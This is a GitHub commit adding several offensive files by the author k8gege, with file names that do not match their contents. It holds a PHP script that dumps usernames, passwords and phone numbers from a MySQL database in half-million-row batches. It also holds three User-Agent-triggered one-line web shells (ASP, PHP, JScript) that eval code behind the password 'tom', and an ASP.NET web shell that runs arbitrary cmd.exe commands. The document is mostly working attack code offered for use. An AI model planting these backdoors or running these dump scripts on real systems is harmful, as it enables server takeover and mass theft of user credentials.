Add files via upload

Author: k8gege

K8_FTP爆破PHP脚本20151010.rar

@@ -0,0 +1,23 @@
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+<?php
+$conn = @mysql_connect("192.168.241.89", "root", "Vega2010##") or die("X Connect failed");
+mysql_select_db("chacha_cloud", $conn);
+mysql_query("set names 'UTF-8'"); 
+
+  $sql="select username,password,phone from user limit 12500000,500000";
+  $query=mysql_query($sql);
+  while($row=mysql_fetch_array($query)){
+    $fp = fopen('t4/14.csv', 'a'); 
+	fwrite($fp,'"'.@$row[username].'","'.@$row[password].'"'.'","'.@$row[phone].'"'."\n"); 
+	fclose($fp); 
+  }  
+echo 'finished';
+  ?>
+
+  log_app
+  device_name,imei,phone
+  
+  user
+  username,password,phone,fullname
+  username,password,phone,address
+  username,password,phone,email

K8_Mysql爆破PHP脚本20151009.rar

@@ -0,0 +1 @@
+<%uastr=Request.ServerVariables("HTTP_USER_AGENT"):pwd="tom":StartStrPos = Instr(uastr, "k0")+Len("k0")  :EndStrPos = Instr(uastr,"==="):Length = EndStrPos - StartStrPos:Res= Mid(uastr,StartStrPos,Length):if (pwd=Res) then:execute replace(uastr,"k0"+Res+"===",""):end if%>

K8_mysql脱裤20170114(千万).php

@@ -0,0 +1 @@
+<? $ua=@$_SERVER["HTTP_USER_AGENT"];$row=split("===",$ua);echo "->|";if($row[0]=="tom")@eval($row[1]);echo "|<-";?>

K8飞刀A专用UA一句话木马.asp

@@ -0,0 +1 @@
+<%@ Page Language="Jscript" %><%var pwd="tom";var uastr=Request.UserAgent;if (uastr.Substring(0, uastr.IndexOf("==="))== pwd) {var code=uastr.Replace(pwd+"===","");eval(code,"unsafe"); };%>

K8飞刀PHP-专用UA一句话木马.php

@@ -0,0 +1,37 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+    txt_WebPath.Text = Server.MapPath(".");
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+    cmdResult.Text = cmdResult.Text + Server.HtmlEncode(ExcuteCmd(txt_cmd.Text));    
+}
+</script>
+<HTML><body ><form id="cmd" method="post" runat="server">
+    <br />
+    WebPath:
+    <asp:TextBox ID="txt_WebPath" runat="server" Width="579px"></asp:TextBox>
+&nbsp; <br />
+    <br />
+<asp:Label ID="Label2" runat="server" Text="Commond: "></asp:Label>
+<asp:TextBox ID="txt_cmd" runat="server" Width="581px"></asp:TextBox>&nbsp;
+<asp:Button ID="Button1" runat="server" onclick="cmdExe_Click" Text="Execute" /><br /><br />
+<asp:TextBox ID="cmdResult" runat="server" Height="662px" Width="798px" TextMode="MultiLine"></asp:TextBox>
+</form></body></HTML>